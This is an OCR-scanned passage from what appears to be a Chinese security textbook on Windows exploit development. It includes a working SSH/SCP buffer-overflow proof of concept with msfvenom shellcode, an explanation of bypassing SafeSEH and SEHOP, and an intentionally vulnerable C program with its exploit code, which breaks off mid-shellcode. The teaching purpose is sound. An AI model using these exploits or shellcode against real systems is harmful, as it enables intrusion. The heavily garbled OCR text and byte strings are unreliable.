在 着 手 开 发 前 ， 尤 其 是 在 计划 使 用 很 长 的 shellcode 时 ， 可 能 要 确定 可 用 于 放置 
shellcode 的 堆栈 空间 的 大 小 。 夺 没有 尽 够 的 可 用 空间 ， 一 种 可 供 选 择 的 方案 是 使 用 
多 级 shellcode 为 额外 阶段 分 配 空间 。 通 闸 最 快速 地 确定 可 用 空间 大 小 的 方式 是 将 大 
量 的 A 传 给 程序 ， 并 手动 检查 程序 骨 尝 后 的 堆栈 状态 。 在 程序 骨 演 后 单 击 调试 右 的 


co 注意 : 这 种 攻击 向 量 并 非 总 能 如 人 所 愿 地 工作 一 实际 测试 中 ， 测 试 人 员 
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堆栈 段 以 确定 可 用 空间 ， 然 后 向 下 滚动 至 堆栈 底部 ， 确 定 A 的 结束 位 置 。 接 下 来 ， 
只 要 以 A 的 结束 位 置 减 去 其 起 始 位 置 即 可 。 这 可 能 不 是 一 种 最 完美 的 方式 ， 但 相对 
其 他 方式 而 言 ， 这 种 方式 更 为 快捷 和 准确 。 

创建 用 于 概念 验证 漏洞 攻击 程序 的 shellcode， 在 Kali Linux 虚拟 机 上 可 以 使 用 
一 个 Metasploit 命 令 行 工 具 一 一 攻击 载 谷 生成 项 : 

$ msfvenom -p windows/exec CMD=calc.exe -b '\x00\x0a' -e 


x86/shikata ga nai -f py 
= SC-UCRE 


表面 命令 的 输出 结果 将 被 添加 到 攻击 脚本 中 (请 注意 变量 名 buf 航 改 成 sc)。 
4. 生成 shellcode 
最 后 ， 将 准备 好 的 各 个 部 分 组 合 在 一 起 ， 用 以 开展 漏洞 攻击 : 


#prosshd3.py POC Exploit 
import paramiko 

from scpclient import * 

from contextlib import closing 
from time import sleep 


import struct 


hostname = "192.168.10.104" 


username = "test1" 

password = "asdf" 

jmp = struct.pack(;®<Lj , 0x7c345c30) # PUSH ESP # RETN 
pad = "Ax90" * 12 # compensate for fstenv 

sc = T- 


sc t= "\xdd\xc4\xd9\x74\x24\xf£4\xb8\x8£\xda\x92\x74\x5b\x33" 
sc += “"\xc9\xb1\x33\x31\x43\x17\x83\xeb\xEc\x03\xcec\xc9\x70" 
Sc += "\x81\x2e\x05\xfd\x6a\xce\xd6\x9e\xe3\x2b\xe7\x8c\x90" 
sc += "\x38\x5a\x01\xd2\x6c\x57\xea\xb6\x84\xec\x9e\xle\xab" 
SC t= "\x45\x14\x79\x82\x56\x98\x45\x48\x94\xba\x39\x92\xco" 
SC += ™\xlc\x03\x5d\xlc\x5c\x44\x83\xef \xO0c\xld\xc8\x42\xal™ 
SC t= "\x2a\x8c\x5e\xcO\xfc\x9b\xdF£\xba\x79\x5b\xab\x7/0\x33" 
sc t= "\x8b\x04\x0e\xcbh\x33\x2e\x48\xec\x42\xe3\x8a\xd0\x0d" 
sc += "\x88\x79\xa2\x8c\x58\xb0\x4b\xbf\xa4\x1£\x72\x70\x29" 
SC += "\x61\xb2\xbo6\xd2\x14\xc8\xc5\x6f\x2f£\x0b\xb4\xab\xba" 
sc += "\x8e\xle\x3f\xlc\xob\x9f\xec\xfb\xf8\x93\x59\x8f\xa7" 
SC t= "\xb7\x5c\x5c\xdc\xc3\xd5\x63\x33\x42\xad\x47\x97\x0£E" 
SC += "\x75\xe9\x8e\xf5\xd8\x16\xd0\x51\x84\xb2\x9a\x73\xdi" 
SC += "\xc5\xc0O\x19\x24\x47\x7£\x64\x26\x57\x80\xc6\x4f£\x66" 
sc += "\x0b\x89\x08\x77\xde\xee\xe7\x3d\x43\x46\x60\x98\x11" 
sc t= "\xdb\xed\x1lb\xcc\x1l£\x08\x98\xe5\xdf\xef\x80\x8£\xda" 
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sc += "\xb4\x06\x63\x96\xa5\xe2\x83\x05\xc5\x26\xe0\xc8\x55" 

Sc += "\xaa\xc9\x6f\xde\x49\x16" 

req = "A" * 489 + jmp + pad + sc 

ssh client = paramiko.SSHClient () 

ssh client.load system host keys () 

ssh _client.connect (hostname, username-username, key filename=None, 
password=password) 

sleep (15) #Sleep 15 seconds to allow time for debugger connect 
with closing (Read(ssh client.get transport(), req)) as scp: 


scp.receive ("foo.txt") 


+ 


co 注意 : 有 时 在 shellcode 之 前 使 用 NOP 或 填充 是 一 种 比较 好 的 做 法 。 用 
WS Metasploit 生 成 的 shellcode 在 调用 GETPC 例 程 时 需要 一 些 堆 栈 空 间 来 将 自 
己 解码 。 


此 外 ， 如 果 EIP 和 ESP 彼 此 靠 得 太 近 ( 当 shellcode 位 于 堆栈 上 时 ， 这 种 情况 很 常 
见 )， 那 么 NOP 填 充 是 防止 数据 被 破坏 的 一 种 好 方法 。 但 在 那 种 情况 下 ， 使 用 一 条 人 徐 
单 的 栈 交 换 指 令 (stack adjust 或 pivot 指 令 ) 也 可 以 雪 效 。 只 需要 在 shellcode 的 前 面 添 加 
一 些 操作 人 码 字 市 (如 add esp, - 450) 即 可 。 可 以 使 用 Metasploit 中 整合 的 汇编 磺 来 提供 
所 需 的 十 六 进 制 指令 : 

root@kali:~# /usr/share/metasploit-framework/tools/metasm shell.rb 


Lupe "exit" or "quit" to quit 
"C" or "Xu" for newline 


use 
metasm » add esp,-450 
"\x81 \xcA4\x3e\xfe\xff\xff" 
metasm > 


5. 根据 需要 调试 涯 洞 攻击 程序 


下 面 将 重启 虚拟 机 ， 并 局 动 上 述 肢 本。 记得 要 快速 地 关联 到 wsshd.exe 并 按 F9 键 
以 运行 程序 。 等 到 程序 发 生 初 始 异 常 之 后， 在 反 汇 编 区 按 CtrltG 组 合 键 以 弹出 Enter 
expression to follow 对 话 杠 ， 输 入 由 Mona 工 具 得 到 的 用 于 跳 转 到 ESP 的 指令 地 址 ， 如 
图 13-15 所 示 。 对 我 们 而 言 ， 这 就 是 MSVCR71.dll 中 的 地 址 0x7c345c30。 按 F9 键 继续 
执行 到 断 点 处 。 

如 有 果 程 序 在 到 达 断 点 前 朋 尝 ， 那 么 可 能 是 因为 在 shellcode 中 存在 坏 字 符 。 这 种 
情况 时 有 发 生 ， 因 为 汤 洞 程序 (这 里 指 客户 端 SCP 程 序 ) 可 能 会 对 特定 的 字符 做 出 有 反 
应 ， 并 导致 漏洞 攻击 程序 被 终止 或 修改 。 
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第 山 部 分 dm dd IX uh 


J 
d 


Ww] 44 x 


76345631 
76345632 
76345636 
7C345C38 4 
7C345C3C| C1EB Í 
7C345C3F| DD85 
7C345C45 | DCB4CÉ ] 
7C345C4C| C3 | | 
7C345C4D| BA E 
7C345C52| 83EC 
7C345 C55 


图 13-1$ ”输入 地 址 


为 找 出 坏 字 符 , 需要 答 看 调试 句 的 内 存 转 储 , 并 与 通过 网 络 实 际 发 送 的 shellcode 
进行 匹配 。 为 搭建 这 种 检查 环境 ， 还 需要 还 原 虚拟 机 并 重新 发 送 攻击 脚本 。 在 初始 
Az. 单 击 栈 段 并 同 下 演 动 直到 看 见 字 母 A 的 序列 。 继续 深 动 找 出 shellcode 并 进 
行 手动 对 比 。 另 一 种 得 找 坏 字符 的 简单 方式 是 依次 将 单个 字 节 所 有 可 能 的 组 合作 为 
输入 。 硅 假定 0x00 为 坏 字 符 ， 则 可 输入 如 下 代码 : 


buf = "™\x01\x02\x03\x04\x05\...\...\xFF" #Truncated for space 


注意 : 可 能 需要 多 次 重复 这 个 查找 坏 字 符 的 过 程 ， 直 到 shellcode 能 够 正确 
HUT. ne ， 应 该 将 所 有 的 空白 字符 (0x00、0x20、0x0a、0x0d、0x1b、 
0x0b、0x0c) 排 除 掉 ， 每 次 排除 一 个 字符 ， 直 到 栈 段 中 只 存在 预期 的 字符 . 


一 旦 shellcode 工 作 正 常 了 , 程序 便 可 到 达 PUSH ESP 和 RETN 指 令 所 在 的 断 点 处 。 
按 F7 键 以 单 步 执行 。 此 时 ， 指 令 指针 指向 NOP 填 充 ， 而 NOP 雪 楼 或 填充 在 反 汇 编 区 
也 应 该 是 可 见 的 ， 如 图 13-16 所 示 。 


& Immunity Debugger - wsshd.exe - [CPU - main thread] 
File View Debug Plugins ImmLib Options Window Help Jobs 


LJ» BS 

BO12EFS88 | legisters CF 
BH12EF8?| 9U ABBE 
Q812EF8R ECX FFDEBBB 
ped e d EDX 96000006 
BHL ZEPSC EBX 96000188 
BB12EPSD| 9€ ESP B612EF88 

i p |) EBP 9012F3 


BB12EF8E 
BB12EFS8F 


Bei zEP9B i EDI @G12F3AB 


881 E EF?1 


| 
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按 F9 键 继续 运行 ， 屏 幕 上 将 弹出 计 复 磺 程序 ， 如 图 13-17 所 示 ， 这 证 明 shellcode 
通过 我 们 的 漏洞 攻击 程序 成 功 执行 了 ! 至 此 我 们 就 已 经 用 一 次 真实 的 漏洞 攻击 演示 
JS Windowsi il] XG FEF HN EAST A FE 

在 本 实验 中 ， 我 们 针对 一 个 已 知 的 Windows 漏 洞 程序 ， 开 发 了 针对 目标 系统 的 
漏洞 攻击 程序 。 上 日 的 在 于 加 深 对 Immunity Debugger 和 Corelan 团 队 的 Mona 搬 件 的 熟 
配 程度 ， 并 实验 漏洞 攻击 程序 开发 者 实施 成 功 攻 击 时 常用 的 基本 技术 。 通 过 识别 那 
些 不 参与 诸如 ASLR 的 漏洞 攻击 反 制 控制 的 模块 ， 能 够 开发 稳定 可 靠 的 漏洞 攻击 程 
序 。 让 我 们 马上 仔细 看 看 各 种 内 存 保护 技术 及 其 规避 方法 ! 


4 Immunity Debugger - wsshd.exe - [CPU - main thread, module ntdll] x: LJ 


‘C| File View Debug ImmLib Options 


OW Bi 4x »u vb Uu 
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MOY EHS, 28620 
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rraneeac| C i ,7734F3HB 
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f SQESEE Sspaagt FFF) 
P72 ESDA BIFFFFFFFF) 
"'ZBESDS 

PT72RESDR > 
PreHRESUL r HE, A HS, PO, GE 


Kd = 
72RESEB Bs 31B8BB5BE 
Rddress 


= 


EXTA —— ERE GAC apaw RE y 


a PM in EPE] 


图 13-17 SH ESSERE 
13.3 理解 SEH 


当 程 序 朋 尝 时 ， 操 作 系 统 提供 了 一 种 称 为 结构 化 异常 处 理 (Structured Exception 
Handling，SEH) 的 机 制 来 试图 恢复 操作 。 这 种 机 制 在 源 代 码 中 通 第 是 通过 trywcatch 
或 try/exception 代 但 块 来 实现 的 : 


int foo(void) { 
_ tryi 
// An exception may occur here 


except ( EXCEPTION EXECUTE HANDLER ) { 
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// This handles the exception 
} 


return 0; 
Windows 使 用 一 种 特殊 结构 来 跟踪 SEHi 记 录 : 


| EXCEPTION REGISTRATION struc 
prev dd = 
handler dd ? 
| EXCEPTION REGISTRATION ends 
EXCEPTION REGISTRATIONZAMNIKEAS ET, "E BA UA FAT. 
e prev: 指 回 下 一 条 SEHiG 录 的 指针 。 
e handler: 指 回 实际 的 异 币 处 理 程序 代 但 的 指针 。 
这 些 记录 (异常 帧 ) 在 运行 时 存储 在 堆栈 上 ， 并 形成 一 个 链表 。 链 表 的 头 指针 总 
是 存放 在 TIB(Thread Information Block, 线程 信 息 块 ) 的 第 一 个 成 员 中 ， 在 x86 机 如 上 
则 对 应 存储 在 FS:[0] 寄 存 器 中 。 如 图 13-18 所 示 ， 链 表 的 末尾 总 是 系统 默认 的 异常 处 
理 程序 ， 而 这 条 EXCEPTION REGISTRATION 记录 的 prev 指 针 总 是 0xffffffff。 


保存 的 EIP 


exc handler 1() | prev 
exc handler. 2( ) NT TIB[0] == FS:[0] 


OXfHHitt 
BRU RS Ab EES PP 


[13-18 SEH 
当 触 发 一 个 异常 时 ， 操 作 系 统 CtdllLdD 会 将 下 面 的 C++ 函数 放 到 堆栈 上 ， 并 调 
HE: 


EXCEPTION DISPOSITION 
= cdecl except handler ( 


MSVCRT!exhandler 
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struct EXCEPTION RECORD *ExceptionRecord, 
void * EstablisherFrame, 

struct CONTEXT *ContextRecord, 

void * DispatcherContext 

E 

EIE, Xue DEBE EIC ae i Re Pe ai PRAA EE 
癌 到 攻击 者 的 代码 (也 在 堆栈 上 )。 但 现在 情况 发 生 了 改变 : 

e EVA HE Za, At Pas MAS o 

e 茶 止 调用 位 于 堆栈 上 的 异常 处 理 程序 。 

SEH 链 可 能 是 一 个 有 趣 的 目标 ， 原 因 在 于 ， 有 时 即使 履 坊 堆栈 上 的 返回 指针 ， 
也 永远 不 会 执行 返回 指令 。 这 通 第 是 由 于 在 到 达 函 数目 部 之 前 ， 将 大 量 字符 发 送 到 
缕 存 区 ， 继 而 友 生 了 读 写 访问 冲突 。 在 本 例 中 ， 沿 看 堆栈 辣 下 ， 超 过 绥 冲 区 之 后 是 
线程 SEH 链 的 位 置 。 读 写 访 问 冲 突 将 导致 对 FS:[0] 解 除 引 用 ， 这 是 存储 第 一 个 
NSEH(Next SEH 值 的 线程 堆栈 地 址 。 堆 栈 中 ，NSEH 位 置 之 下 融 是 要 调用 的 第 一 个 
处 理 程序 的 地 址 。 如 琳 无 法 使 用 返回 地 址 宪 匠 ， 使 用 目 定义 地 址 进行 覆 击 通常 十 天 
取 控 制 权 的 简便 方式 。SafeSEH 旨 在 取代 这 种 技术 ， 但 稍 后 可 以 看 到 ， 很 容易 束 能 
ie Sei SafeSEH . 


13.4 ”理解 和 绕 过 Windows 内 存 保护 


正如 可 预料 的 那样 ， 随 着 时 间 的 推 稀 ， 攻 击 者 学 会 了 利用 早期 Windows 版 本 缺 
乏 内 存 保 护 而 进行 攻击 的 方法 。 作 为 啊 应 ， 微 软 公 司 大 约 从 Windows XP SP2 和 
Windows Server 2003 起 ， 开 始 添加 内 存 保护 功能 ， 这 在 一 段 时 间 内 确实 非常 有 效 。 
然而 ， 最 终 ， 攻 击 者 也 找到 了 绕 过 这 些 保护 机 制 的 方法 。 这 正 古 不 断 进化 的 汤 洞 攻 
击 和 安全 防护 相互 博弈 的 结果 : 互相 促 动 ， 造 就 役 此 的 成 功 。 


13.4.1 SafeSEH 


安全 结构 化 异常 处 理 (Safe Structured Exception Handling，SafeSEH) 保 护 机 制 的 
作用 是 防止 覆盖 和 使 用 存储 于 堆栈 上 的 SEH 结 构 。 如 果 使 用 /SafeSEH 链 接 器 选项 编 
译 和 链接 一 个 程序 ， 那 么 对 应 二 进 制 的 头 部 将 包含 一 张 由 所 有 合法 异 弟 处 理 程序 组 
成 的 表 ， 当 调用 异 第 处 理 程 序 时 会 检查 这 张 表 ， 用 以 确保 所 需 的 处 理 程序 在 这 张 表 
中 。 这 项 检查 工作 是 作为 ntdll.dll 中 的 RtliDispatchException 例 程 的 一 部 分 来 完成 的 ， 
将 执行 以 下 测试: 

e 确保 异常 记录 位 于 当前 线程 的 堆栈 上 

e 确保 处 理 程序 的 指针 没有 指 回 堆栈 
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e 人 确保 处 理 程序 已 在 经 授权 处 理 程序 列表 中 登记 

e 全 保 处 理 程 序 位 于 可 执行 的 内 存 镜像 中 

因此 可 看 出 ，SafeSEH 保 护 机 制 对 于 保护 异常 处 理 程序 相当 有 效 ， 但 和 后 将 看 
到 ， 这 也 并 非 绝 对 安全 。 


13.4.2” 统 过 SafeSEH 


前 面 曾 讨 论 过 ， 当 触发 异常 时 ， 操 作 系 统 会 在 堆栈 上 放置 cxcept_handler 函 数 并 
调用 它 ， 如 图 13-19 所 示 。 


EM NS 
m] 


图 13-19 ”正在 处 理 异 常 时 的 堆栈 


EXCEPTION DISPOSITION cdecl except handler : 
c't  EXCEPTIO IN RECORD * Exc epti onEBecard, 
void * Esta blisherFrame 


ESP 


struct T una * Conte xtRe cord, 
atcherContext 


ESP+8 


dil/exe 中 的 某 个 位 置 
(8 FA/SafeSEH) 


首先 ， 请 注意 在 处 理 异 党 时 ， EstablisherFrame 指 针 位 于 ESP+8， 它 实际 上 指 回 

的 是 异常 处 理 程序 链表 的 顶部 。 因 此 ， 如 果 将 被 覆盖 的 异常 处 理 记 录 中 的 _next 指 针 

修改 为 一 条 汇编 指令 EB 06 90 90( 向 前 跳 6 个 字 节 )， 并 将 其 handler 指 针 改 成 某 个 共 

享 的 dlLexe 中 POP、POP、RETN 指 令 序 列 所 在 的 位 置 ， 就 可 将 程序 的 控制 流 重 定 问 

到 堆栈 上 的 攻击 者 代码 区 域 。 当 操作 系统 处 理 该 异常 时 ， 就 会 调用 该 处 理 程序 ， 而 

它 实 际 上 会 从 堆栈 上 弹出 8 个 字 节 , 并 执行 ESP+8 人 处 指向 的 指令 (JMP 06 命 令 ), 这 样 ， 

控制 权 将 被 重 定 向 到 堆栈 上 的 攻击 者 代码 区 域 ， 而 那里 可 能 就 是 放置 shellcode 的 地 

pr 

— d 注意 : 在 这 个 场景 下 ， 只 需要 向 前 跳 6 个 字 — 青 除 后 面 的 地 址 以 及 2 字 

\_ 写 ”的 跳 转 指 令 。 有 时 ， 由 于 空间 受到 限制 ， (54 AUD EKEN. 
那样 的 话 ， 就 需要 使 用 采用 负 ppd É4-EB FA FF FF 将 向 
后 跳 6 字 节 )。 


关于 攻击 SEH 行 为 的 最 利用 技术 的 优秀 指责 位 于 Corelan.be 网 站 (https:/wwww. 
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corelan.be/1index.php/2009/07/23/writng-bufter-overflow-exploits-a-quick-and-basic- 
tutorial-part-2/). it SafeSEH HS 3c fal [58 77 3X £x de A Dt JS 8 Dt TU id HJ 
块 ， 并 使 用 上 述 技术 。 


13.4.3 SEHOP 


1E Windows Server 2008 中 , $4408 f 5 —J947JSEH4& i PRI (SEH Overwrite 
Protection, SEHOP)IS fe Lil. € HRtIDispatchException f FEKE, x3k JJ Fes Ath 
HETEK, JP DR BE Si ntdll.dllrF AYFinalExceptionHandler rh} 20. WRIA 18 us 
了 某 个 异 和 处 理 程序 帧 ， 该 链表 就 会 被 破坏 ， 因 而 在 正 稼 情况 下 将 不 会 继续 到 达 
FinalExceptionHandler 范 数 。 这 里 的 关键 词 是 “ 正 第 情况 下 ”， 因 为 Sysdream.com 的 
Stéfan Le Berre 和 Damien Cauquil £$ ub HH, iit th ii — ^ 18 [n] ntdll.dll PY 
FinalExceptionHandler A ACH) Fi ii, nf SEA Uil «e RAN AB AFAR. SEHOP 
{E Windows 7. Windows 8 和 Windows 10 上 并 非 默 认 开 局， 但 在 Windows Server 2012 
及 更 新 版 本 上 被 默认 局 用 了 。 可 通过 注册 表 或 微软 的 增强 防御 体验 工具 包 (Enhanced 
Mitigation Experience Toolkit，EMET) 尼 用 它 ， 这 是 最 利用 的 管理 保护 的 方法 。 使 用 
EMET 启 用 SEHOP 时 ， 线 程 栈 SEH 链 表 末端 的 NSEH 位 置 不 再 有 0Oxffftff nu 区 ， B 
指 癌 为 EMETdl 创 建 的 内 存 区 域 。 该 内 存 区 域 是 期 望 的 0x 
EMET.dll，EMET.dll 包 含 13.4.4 节 中 将 要 描述 的 特定 指令 集 。 


13.4.4 S863SEHOP 


来 日 Sysdream.com 的 团队 开发 了 一 种 绕 过 SEHOP 的 聪明 方法 : 重新 构造 一 个 以 
实 i 系统 默认 异 第 处 理 程 序 AtdllIFinalExceptionHandlen 结 尾 的 SEH 链 表 。 需 要 注 
最 初 这 种 攻击 只 在 有 限 的 条 件 下 才能 奏效 ， 即 需要 满足 下 列 所 有 条 件 。 
具有 本 地 系统 访问 权限 (本 地 漏洞 攻击 )。 
存在 可 使 用 空 字 节 的 memcpy 类 型 的 漏洞 。 
被 控制 的 堆栈 内 存 地 址 的 第 3 个 字 节 在 0x80 和 0xFB 之 间 。 

能 找到 一 个 没有 受到 SafeSEH 保 护 的 模块 /DLL， 并 包含 以 下 指令 友 列 (和 后 

MERE): 
e XOR [register, register | 
* POP [register] 
* POP [register] 
* RETN 
这 些 指令 用 于 复制 EMET.dll 中 存储 的 指令 。 

Sysdream 团 队 解 释 道 ， 最 后 一 个 条 件 并 非 像 它 听 起 来 那么 难 : 通 沿 在 函数 末尾 
需要 返回 零 或 NULL 值 (对 EAX 进行 异 或 运算 ， 然 后 函数 返回 ) 时 就 会 满足 这 个 条 件 。 
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—y ” 注意 : 可 以 使 用 Imona fw -s xor eax, eax # pop * # pop * # ret -m <module> 
Vox 搜索 所 需 的 序列 ， 但 可 能 需要 使 用 不 同 的 通配符 反复 尝试 。 

如 图 13-20 所 示 ， 伪 造 的 SEH 链 表 和 被 存放 在 堆栈 上 ， 而 最 后 一 项 记录 束 是 系统 的 
认 异 第 处 理 程序 的 真正 位 置 。 


XOR EAX, EAX 
POP EAX 
POP EAX 


RFT Be] ws 
MES 下 一 个 SEH 
E - 


Ui SEH 处 理 程序 
OP NOP NOP NOP 


OP NOP NOP NOP 
OP NOP NOP NOP 
OP NOP NOP NOP 
OP NOP NOP NOP 
OP NOP NOP NOP 
OP NOP NOP NOP 


OP NOP NOP NOP 


EB 08 jmp 8 
OxFFFFEFFF | 下 一 个 SEH 


ntdlllFinalExceptionHandler | SEH 处 理 程 序 


NOP NOH NOP NOP 
NOP NOH NOP NOP 


开始 


图 13-20” 绕 过 SEHOP 的 技术 (经 Sysdream.com 授 权 使 用 ) 


这 项 技术 与 传统 的 SafeSEH 技 术 的 关键 不 同 之 处 在 于 使 用 下 (如果 和 守 于 0 就 跳 转 ) 
指令 来 代替 传统 的 短 跳 EB) 指 令 。 正 指令 (74) 有 一 个 只 有 一 字 节 大 小 的 操作 数 ， 用 
作 有 符号 整数 偏 移 。 因 此 ， 如 果 和 希望 同 后 跳 10 个 字 访 ， 那 么 操作 但 就 是 74F7。 现 在 
由 于 有 了 一 条 徐 短 的 汇编 指令 ， 而 它 同 时 也 可 能 是 堆栈 上 的 一 个 有 效 内 存 地 址 ， 
此 便 可 实施 这 种 攻击 。 如 图 13-20 所 示 ， 用 一 个 指 癌 被 攻击 者 控制 的 内 存 区 域 的 有 效 
指针 来 履 兰 指 回 下 一 个 SEH 记 录 的 指针 ， 攻 击 者 将 在 那里 放置 伪造 的 SEH 记 录 ， 
中 包含 系统 默认 异常 处 理 程序 的 实际 地 址 。 NEUE Ace ND 
序列 (位 于 一 个 未 受 SafsSEH 保 护 的 模块 /DLL 中 ) 的 地 址 来 覆盖 指向 SEH 异 常 处 理 程 
序 的 指针 。 这 与 设置 特殊 寄存 器 中 的 零 标 志 位 具有 同样 的 效果 ， 并 将 执行 下 (74) 指 
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可 以 踏 独 这 个 NOP 雪 要 到 达 下 一 条 指令 (CEB 08), 
———— M -市 )， 然 后 继续 进入 下 一 个 NOP 雪 权 ， 并 最 终 跳 
过 最 后 的 SEH 记 录 ， 进 入 真正 的 shellcode 中 。 
现 将 与 本 例 中 所 摘 述 的 攻击 方法 对 应 的 栈 内 存 的 布局 总 结 如 下 。 
NOP251& 


e EB 08( 可 能 需要 使 用 EB 0A 跳 过 这 两 个 地 址 ) 

e 下 一 个 SEH 记 录 : 被 控制 的 栈 内 存 上 以 74( 负 字 节 ) 结 尾 的 地 址 

e SEH 处 理 程序 : 未 受 SafeSEH 保 护 的 模块 中 XOR/POP/POP/RETN 指 令 序列 
的 地 址 
NOP IR 


EB 08( 可 能 需要 使 用 EB 0A 跳 过 这 两 个 地 址 ) 
之 前 给 定 的 地 址 0xFFFFFFFF 
实际 的 系统 默认 异 单 处理 程 序 
shellcode 
为 演示 这 种 漏洞 攻击 ， 将 使 用 下 面 的 漏洞 程序 ( 受 SafeSEH 保 护 ) 及 其 关联 的 
DLL( 未 受 SafeSEH 保 护 ): 


// fool.cpp : Defines the entry point for the console application. 
#finclude "stdafx.h" 

#include "stdio.h" 

#include "windows.h" 


extern "C"  declspec(dllimport)void test(); 


void GetInput(char* str, char* out) 
{ 
long lSize; 
char buffer[500]; 
char * temp; 
FILE * hFile; 
Size LE result; 
try 1 
hFile = fopen(str, "rb"); //open file for reading of bytes 
if (hFile--NULL) {printf ("No such file"); exit(1);) 
//error checking 
//get size of file 
fseek(hFile, 0, SEEK END); 
1Size = ftell(hFile); 
rewind (hFile); 
temp = (char*) malloc (sizeof(char) *1Size); 
result = fread(temp,1,1Size,hFile) ; 
memcpy (buffer, temp, result); //vulnerability 
memcpy (out, buffer, strlen (buffer)); //triggers SEH before /GS 


273 


第 川 部 分 de de DX ou 


printf ("Input received : $sMn",buffer); 
} 
catch (char * strErr) 
{ 
printf("No valid input received ! An"); 
printf ("Exception : $sWMn",strErr); 
} 
test(); //calls DLL, demonstration of XOR, POP, POP, RETN sequence 
} 


int main(int argc, char* argv[]) 


{ 
char foo[2048]; 
char buf2[500]; 
GetInput (argv[1],buf2); 
return 0; 
} 


注意 : 尽管 这 是 一 个 定型 攻击 (Canned Exploit)， 但 却 是 现实 中 真实 存在 的 
TJ. 它 可 以 用 来 绕 过 /GS、SafeSEH 和 SEHOP 保 护 机 制 , 很 值得 党 试 一 下 。 


下 面 给 出 的 是 与 fool.c 程 序 相 关 的 DLL: 
// £oolDLL.cpp : Defines the exported functions for the DLL application. 
//This DLL simply demonstrates XOR, POP, POP, RETN sequence may be 
// found in the wild with functions that return a Zero or NULL value 


#include "stdafx.h" 


extern "C" int | declspec(dllexport) test(){ 


asm 
{ 
XOr eax, eax 
pop esi 
pop ebp 
retn 
} 


} 

可 在 Visual Studio 2017 Community Edition 中 创建 这 个 程序 和 DLL。 主 程序 fool.c 
在 编 详 时 采用 /GS 和 /SafeSEH 保护 (增加 了 SEHOP 保 护 )， 但 没有 包含 
DEPUNXCOMPAT) 或 ASLRUDYNAMICBASE) 保 护 ， 而 DLL 在 编译 时 只 采用 了 /GS 
保护 。 如 果 SEHOP 看 似 丢失 ， 可 使 用 EMET 局 用 和 它 。 
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o 注意 : 也 可 通过 命令 行 方式 编译 foo1 和 fool.dll 文 件 ， 方 法 是 将 stdafx.h 引 用 
KS Eit, AER F ERATAN. 
cl /LD /GS foolDLL.cpp /link /SafeSEH:no /DYNAMICBASE:no 
/NXCompat :no 
cl /GS /EHsc fool.cpp foolDLL.lib /link /SafeSEH /DYNAMICBASE:no 
/NXCompat : no 
编译 完 程序 后 ， 便 可 在 OllyDbg 或 Imnmunity Debugger 中 进行 观察 并 验证 : 程序 
受到 /SafeSEH 保 护 ， 而 DLL 却 没有 。 这 里 将 使 用 OllySSEH 插 件 ( 可 从 OpenRCE.org 网 
站 下 载 )， 如 图 13-21 所 示 。Mona 可 使 用 上 述 fw(find wildcard) 命 令 完 成 同样 的 操作 。 


File View Debug |Plugins | Options Window Help be 
BX) PIM) 1 Bookmarks > UElm TI Ww) wc) 7) K) BI) RI} 8) YY 


2 Command line 
3 SafeSEH 


- CPU - main threa 


4BcBOB D: foo-Fonl.& 
TbB8CBOD |6.1. 7600. 16385 (win? rtn. 8580713 C: Windows <SYSTEMS2\n tdl L. dil 
10. 00. 20319., L Ci lJindowssystema32-HSUCRIBOD, dl l 


S666 |6. 1.7600. 16565 (win? rtn.: 098715 Cz »Iindows*ssystem32-KERHELBRSE,.dLL 
人 6.1. 7608. 16385 (win? rtn.8909713 oct NE LOGUE qescanw Warne Se dil 


图 13-21 ”使 用 OllySSEH 插 件 
接 下 来 ， 在 二 进 制 代 码 中 搜索 XOR/POP/POP/RETN 指 令 序 列 ， 如 图 13-22 所 示 。 
jx) »ju| eds tijt i) 5j. LI El M) rjw|n| c] z] K| B| R--Js] YY 


ec CPU - main thread, module fool DLL 


ÁAÁSatesEHM OFF 


Dk1BDOBOOP Gof 


Find sequence of commands 


Mir 


图 13-22 ”搜索 指令 序列 


| zX 注意 : 一 些 便捷 的 OllyDbg 和 和 Immunity Debugger 插 件 也 可 用 于 完成 此 类 搜 
XS 索 工 作 。 也 可 按 CtrlHS， 在 反 汇 编 栏 输入 所 需 指 令 进 行 手动 搜索 。 


现在 ， 利 用 找到 的 地 址 创建 一 个 名 为 sploit.c 的 漏洞 攻击 程序 。 该 程序 将 创建 攻 
击 绥 神 区 并 将 其 写 入 一 个 文件 中 ， 以 便 传 给 漏洞 程序 。 这 里 的 代码 以 Sysdream.com 
团队 的 代码 为 基础 并 经 过 了 大 幅 人 和 修改， 代码 开头 的 注释 中 有 相应 的 说 明 。 

#include <stdio.h> 


include <stdlib.h> 
#include <windows.h> 
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/* 

Credit: Heavily modified code from: 

St ifan LE BERRE (s.leberre@sysdream. com) 

Damien CAUQUIL (d.cauquil@sysdream.com) 
http://ghostsinthestack.org/ 

http://virtualabs.fr/ 

http://sysdream.com/ 

ed 

/ / finding this next address takes trial and error in ollydbg or other debugger 
char nseh[] = "\x74\xF4\x12\x00"; //pointer to OxFFFFFFFF, then Final EH 
char seh[] = "\x7E\x13\x01\x10"; //pointer to xor, pop, pop, ret 


/* Shellcode size: 227 bytes */ 
char shellcode[] = "\xb8\x29\x15\xd8\xf7\x29\xc9\xb1\x33\xdd" 

"\xc2\xd9\x7/74\x24\xf4\x5b\x31\x43\x0e\x03" 
"\x43\x0e\x83\xea\x11\x3a\x02\x10\xf1\x33" 
"\xed\xe8\x02\x24\x67\x0d\x33\x76\x13\x46" 
"\x66\x46\x57\x0a\x8b\x2d\x35\xbe\x18\x43" 
"\x92\xb1\xa9\xee\xc4\xfc\x2a\xdf\xc8\x52" 
"\xe8\x41\xb5\xa8\x3d\xa2\x84\x63\x30\xa3" 
"\xcl\x99\xbb\xf1\x9a\xd6\x6e\xe6\xaf\xaa" 
"\xb2\x07\x60\xal\x8b\x7£\x05\x75\x7£\xca" 
"\x04\xa5\xd0\x41\x4e\x5d\x5a\x0d\x6£f\x5c" 
"\x8f\x4d\x53\x17\xa4\xa6\x27\xa6\x6c\xf7" 
w\xc8B\x99\x50\x54\xE7\x16\x5d\xa4\x3fF\x90" 
"\xbe\xd3\x4b\xe3\x43\xe4\x8£\x9e\x9fF\x61" 
"\x1l2\x38\x6b\xdl \xf6\xb9\xb8\x84\x7d\xb5" 
"\x75\xc2\xda\xd9\x88\x07\x51\xe5\x01\xa6" 
"\xb6\x6c\x5l\x8d\x12\x35\x01\xac\x03\x93" 
"\xe4\xd1\x54\x7b\x58\x74\xle\x69\x8d\x0e" 
"\x7d\xe7\x50\x82\xfb\x4e\x52\x9c\x03\xe0" 
